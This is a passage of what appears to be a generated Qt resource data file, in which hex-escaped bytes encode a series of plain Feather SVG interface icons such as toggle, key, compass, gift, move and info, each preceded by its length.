\x33\x38\x20\x38\x2e\x33\x38\x20\x30\x20\x30\x20\x31\x2d\x2e\x39\
\x2d\x33\x2e\x38\x20\x38\x2e\x35\x20\x38\x2e\x35\x20\x30\x20\x30\
\x20\x31\x20\x34\x2e\x37\x2d\x37\x2e\x36\x20\x38\x2e\x33\x38\x20\
\x38\x2e\x33\x38\x20\x30\x20\x30\x20\x31\x20\x33\x2e\x38\x2d\x2e\
\x39\x68\x2e\x35\x61\x38\x2e\x34\x38\x20\x38\x2e\x34\x38\x20\x30\
\x20\x30\x20\x31\x20\x38\x20\x38\x76\x2e\x35\x7a\x22\x3e\x3c\x2f\
\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x43\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x6f\x67\x67\x6c\
\x65\x2d\x6c\x65\x66\x74\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\
\x22\x31\x22\x20\x79\x3d\x22\x35\x22\x20\x77\x69\x64\x74\x68\x3d\
\x22\x32\x32\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x34\x22\
\x20\x72\x78\x3d\x22\x37\x22\x20\x72\x79\x3d\x22\x37\x22\x3e\x3c\
\x2f\x72\x65\x63\x74\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\
\x3d\x22\x38\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\
\x33\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x70\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x78\x2d\x73\x71\x75\
\x61\x72\x65\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x33\x22\
\x20\x79\x3d\x22\x33\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x38\x22\x20\x72\x78\
\x3d\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\
\x63\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x39\x22\x20\
\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x31\x35\x22\x20\x79\
\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x35\x22\x20\x79\x31\x3d\x22\
\x39\x22\x20\x78\x32\x3d\x22\x39\x22\x20\x79\x32\x3d\x22\x31\x35\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x60\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6b\x65\x79\x22\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x31\x20\x32\x6c\x2d\
\x32\x20\x32\x6d\x2d\x37\x2e\x36\x31\x20\x37\x2e\x36\x31\x61\x35\
\x2e\x35\x20\x35\x2e\x35\x20\x30\x20\x31\x20\x31\x2d\x37\x2e\x37\
\x37\x38\x20\x37\x2e\x37\x37\x38\x20\x35\x2e\x35\x20\x35\x2e\x35\
\x20\x30\x20\x30\x20\x31\x20\x37\x2e\x37\x37\x37\x2d\x37\x2e\x37\
\x37\x37\x7a\x6d\x30\x20\x30\x4c\x31\x35\x2e\x35\x20\x37\x2e\x35\
\x6d\x30\x20\x30\x6c\x33\x20\x33\x4c\x32\x32\x20\x37\x6c\x2d\x33\
\x2d\x33\x6d\x2d\x33\x2e\x35\x20\x33\x2e\x35\x4c\x31\x39\x20\x34\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x65\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x72\x72\x6f\x77\
\x2d\x75\x70\x2d\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x63\x69\x72\
\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\
\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\
\x63\x6c\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x31\x36\x20\x31\x32\x20\x31\x32\x20\x38\
\x20\x38\x20\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\
\x79\x31\x3d\x22\x31\x36\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\
\x79\x32\x3d\x22\x38\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x56\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x6d\x70\x61\
\x73\x73\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\
\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\
\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x6f\x6c\
\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x36\x2e\
\x32\x34\x20\x37\x2e\x37\x36\x20\x31\x34\x2e\x31\x32\x20\x31\x34\
\x2e\x31\x32\x20\x37\x2e\x37\x36\x20\x31\x36\x2e\x32\x34\x20\x39\
\x2e\x38\x38\x20\x39\x2e\x38\x38\x20\x31\x36\x2e\x32\x34\x20\x37\
\x2e\x37\x36\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x2b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x78\x22\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x38\x22\x20\x79\x31\x3d\x22\
\x36\x22\x20\x78\x32\x3d\x22\x36\x22\x20\x79\x32\x3d\x22\x31\x38\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x36\x22\x20\x79\x31\x3d\x22\x36\x22\x20\x78\x32\x3d\
\x22\x31\x38\x22\x20\x79\x32\x3d\x22\x31\x38\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xe1\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x67\x69\x66\x74\x22\
\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\
\x73\x3d\x22\x32\x30\x20\x31\x32\x20\x32\x30\x20\x32\x32\x20\x34\
\x20\x32\x32\x20\x34\x20\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x32\x22\
\x20\x79\x3d\x22\x37\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x30\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x35\x22\x3e\x3c\x2f\x72\
\x65\x63\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\
\x22\x20\x79\x31\x3d\x22\x32\x32\x22\x20\x78\x32\x3d\x22\x31\x32\
\x22\x20\x79\x32\x3d\x22\x37\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x32\x20\x37\x48\x37\
\x2e\x35\x61\x32\x2e\x35\x20\x32\x2e\x35\x20\x30\x20\x30\x20\x31\
\x20\x30\x2d\x35\x43\x31\x31\x20\x32\x20\x31\x32\x20\x37\x20\x31\
\x32\x20\x37\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\
\x74\x68\x20\x64\x3d\x22\x4d\x31\x32\x20\x37\x68\x34\x2e\x35\x61\
\x32\x2e\x35\x20\x32\x2e\x35\x20\x30\x20\x30\x20\x30\x20\x30\x2d\
\x35\x43\x31\x33\x20\x32\x20\x31\x32\x20\x37\x20\x31\x32\x20\x37\
\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x01\x3e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x72\x6e\x65\
\x72\x2d\x64\x6f\x77\x6e\x2d\x72\x69\x67\x68\x74\x22\x3e\x3c\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\
\x31\x35\x20\x31\x30\x20\x32\x30\x20\x31\x35\x20\x31\x35\x20\x32\
\x30\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\
\x61\x74\x68\x20\x64\x3d\x22\x4d\x34\x20\x34\x76\x37\x61\x34\x20\
\x34\x20\x30\x20\x30\x20\x30\x20\x34\x20\x34\x68\x31\x32\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xe6\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x6f\x76\x65\x22\
\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\
\x73\x3d\x22\x35\x20\x39\x20\x32\x20\x31\x32\x20\x35\x20\x31\x35\
\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x39\
\x20\x35\x20\x31\x32\x20\x32\x20\x31\x35\x20\x35\x22\x3e\x3c\x2f\
\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x35\x20\x31\x39\
\x20\x31\x32\x20\x32\x32\x20\x39\x20\x31\x39\x22\x3e\x3c\x2f\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x39\x20\x39\x20\x32\
\x32\x20\x31\x32\x20\x31\x39\x20\x31\x35\x22\x3e\x3c\x2f\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x32\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\x22\
\x32\x32\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\
\x20\x79\x31\x3d\x22\x32\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\
\x79\x32\x3d\x22\x32\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x4b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x61\x78\x69\x6d\
\x69\x7a\x65\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x38\
\x20\x33\x48\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\x32\
\x20\x32\x76\x33\x6d\x31\x38\x20\x30\x56\x35\x61\x32\x20\x32\x20\
\x30\x20\x30\x20\x30\x2d\x32\x2d\x32\x68\x2d\x33\x6d\x30\x20\x31\
\x38\x68\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x2d\
\x32\x76\x2d\x33\x4d\x33\x20\x31\x36\x76\x33\x61\x32\x20\x32\x20\
\x30\x20\x30\x20\x30\x20\x32\x20\x32\x68\x33\x22\x3e\x3c\x2f\x70\
\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x69\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x72\x72\x6f\x77\
\x2d\x72\x69\x67\x68\x74\x2d\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\
\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\
\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\
\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x32\x20\x31\x36\x20\x31\
\x36\x20\x31\x32\x20\x31\x32\x20\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x38\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\x22\x31\
\x36\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x5b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x69\x6e\x66\x6f\x22\
